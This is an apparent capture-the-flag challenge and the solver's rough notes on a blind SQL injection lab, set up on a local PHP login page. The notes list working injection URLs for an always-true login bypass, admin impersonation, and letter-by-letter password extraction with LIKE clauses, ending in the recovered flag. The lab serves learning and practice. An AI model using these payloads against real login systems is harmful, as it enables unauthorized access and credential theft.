“In the Dark: Blind SQL Injection”

A login system has been deployed in a hurry.
It gives almost no errors, no warnings, and no visible database output.

Everything looks normal.
Too normal.

But behind the scenes, the database is listening.

Your mission:
Extract the admin password without ever seeing the database response directly.

You will not be shown the data.
You must infer it.

Welcome to the dark side of SQL Injection.

Hint: The system only answers one thing:
Success or Failure

Can you ask the right questions????
-----------------------------------------------------------------------------------
The login mechanism accepts a password  (pw) from the URL and embeds it directly into an SQL query.
The input is not safely handled, and SQL injection can be conducted. 

starting mysql,
sudo systemctl start mysql
sudo systemctl status mysql

log in to mysql ,  sudo mysql

start php server,
php -S 127.0.0.1:8000

challege page link ,  http://127.0.0.1:8000/sample.php

checking if injection is possible , 
http://127.0.0.1:8000/sample.php?pw='       , must show error
admin login , http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%23


use the link , http://127.0.0.1:8000/sample.php?pw=%27||1=1%23 , to login as guest

use link , http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%23 , to login as admin

Finding password letter by letter

LIKE "s%"  , checks if s is the first character,  % denote anything after s.
If condition is true , logs in as admin.

Checking first letter of password is "A" , if shows hello guest , admin pass not start with a
http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26pw%20LIKE%20%27 a %25%27%23

checking for "b", 
http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26pw%20LIKE%20%27 b %25%27%23

similarliy try for c, http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26pw%20LIKE%20%27 c %25%27%23
this is how sql injection works.... tyring for oyherr letrters until correct one is obtained...
   not working upto d , trying letters 


tryinng upper case , http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26%26pw%20LIKE%20%27A%25%27%23

Got first letter as S, http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26%26pw%20LIKE%20%27S%25%27%23

finding the second letter...
 Got U as the second letter...http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26%26pw%20LIKE%20%27 SU %25%27%23

finding third letter..  

GOT SUP  as third letter , http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26%26pw%20LIKE%20%27 SUP %25%27%23

got SUPE as 4th .......
GOT SUPER   ...
got SUPERS ...
SUPERSE
SUPERSEC
GUESS , supersecret , http://127.0.0.1:8000/sample.php?pw=%27||id%3D%27admin%27%26%26pw%20LIKE%20%27supersecret%25%27%23

confirming pass , http://127.0.0.1:8000/sample.php?pw=supersecret ,
shows CHALLENGE CLEARED!! Hello admin !!


flag{supersecret}

